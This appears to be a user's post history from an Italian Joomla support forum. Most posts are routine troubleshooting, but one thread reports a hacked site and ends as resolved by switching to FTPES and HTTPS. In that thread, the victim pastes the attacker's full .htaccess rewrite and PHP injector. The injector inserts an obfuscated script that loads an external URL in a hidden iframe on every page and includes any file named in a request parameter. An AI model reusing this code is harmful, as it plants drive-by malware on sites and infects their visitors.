Post

1

Sicurezza / Re:Hacker sul mio sito Joomla 1.15.14[RISOLTO]

« il: 19 Set 2009, 00:03:41 »

Risolto il grave problema, praticamente sniffavano completamente le pwd dell'FTP/Cpanel di tutti i miei siti presenti su l'hosting di serverplan ,per risolvere il problema abbiamo attivato l'FTPES su tutti i miei siti e ho dovuto utilizzare cpanel con l'https.
Grazie

2

Sicurezza / Re:Hacker sul mio sito Joomla 1.15.14

« il: 15 Set 2009, 16:07:44 »

Ho dovuto impostare la home che fa una chiamata di login perchè altrimenti gli utenti quando si loggano mi entrano nella home anzichè nel pagina di mio interesse.
Comunque confermo anche a me che mi hanno bucato in maniera simile tutti i siti joomla sia 1.15.14 che 1.0 che avevo sull'hosting di Serverplan quindi ora vi chiedo se riescono a sniffare la pwd di Cpanel il problema è di joomla o è un problema di sicurezza dei server di Serverplan? Alla fine krikykk come hai risolto?
Grazie

3

Sicurezza / Re:Hacker sul mio sito Joomla 1.15.14

« il: 13 Set 2009, 19:55:50 »

Il codice penso sia di aiuto ad altri dato che su google ne ho trovati molti infetti comunque ora ho ripristinato il bk prima dell'attacco sperando che non lo riattaccano cmq il link è www.andrealedaro.com non utilizzo intro ma 2 template.

4

Sicurezza / Hacker sul mio sito Joomla 1.15.14

« il: 13 Set 2009, 19:34:45 »

Ciao a tutti,
             mi è capitata una cosa molto strana:
Il 5 settembre il mio sito joomla prima dell'attacco era così composto:
joomla 1.15.9
community builder 1.2

Poi sono entrati e mi hanno attivato e scritto l'.htaccess con questi parametri:

Codice: [Seleziona]

#mmmmd

RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]

dove mi hanno creato nella root il file

.heder.php.php

<?php

$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';



function get_file_dir_($file) {

    global $argv;

    $dir = dirname(getcwd() . '/' . $file);

    $curDir = getcwd();

    chdir($dir);

    $dir = getcwd();

    chdir($curDir);

    return $dir;

}



function callback($data)

{

global $frame_code;

if(preg_match("/(<.*?body.*?>)/i", $data) > 0)

return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);

else return $data.$frame_code;

}



ob_start('callback');

$file = $_GET['qq'];

chdir(get_file_dir_($file));



include($file);
?>
Inoltre mi hanno messo un iframe nella index.html tanto che una volta che scarico il file index.html sul pc AVG mi dice che è un virus /html .
Hanno pure modificato la cartella xmlrpc inserendoci sempre lo stesso .htaccess e .heder.php.php.

Praticamente quando provo ad accedere alla home ho pagina bianca e la parte di administrator sempre pagina bianca.

Ho ripristinato un backup , ho aggiornato alla versione 1.15.14 stabile , ho cambiato tutte le pwd admin /FTP / mysql veramente complesse.

Ma purtroppo oggi ritrovo lo stesso problema pagina bianca , l'hosting serverplan mi dice che il problema è il mio di aggiornamento di joomla ma più di così non so cosa fare, come fanno ad entrare nel mio spazio e fare tutto questo?

5

Installazione, migrazione e aggiornamento / Re: In seguito a migrazione, si riscontra errore " Cannot send session cookie "

« il: 24 Dic 2008, 17:36:58 »

Stesso preciso errore pure a me! Ho controllato il file configuration.php e tutto apposto e nel file di session.php ho aggiunto ?> finale che mancava ma nulla.
Spero che qualcuno risolva questo problema.
Vi ringrazio anticipatamente.
Mirco

6

Gestione sito multilingua / Re: Settaggio Lingua Default

« il: 13 Ott 2008, 00:25:31 »

Ho disattivato il componente shs404SEF e ora tutto funziona!
Lo riattiverò quando ho tradotto tutto il sito in maniera da evitare che si incasini.
Ciao

7

Gestione sito multilingua / Re: Settaggio Lingua Default

« il: 12 Ott 2008, 23:21:25 »

Ciao LoganCale,
               ho il tuo stesso problema con joomla 1.0.13 con joomfish 1.8, malgrado la mia lingua di default sia l'italiano si ostina a presentarmi di default l'inglese.
Se sei riuscito ti prego di farmi sapere che sto impazzendo  .
Ciao e grazie mille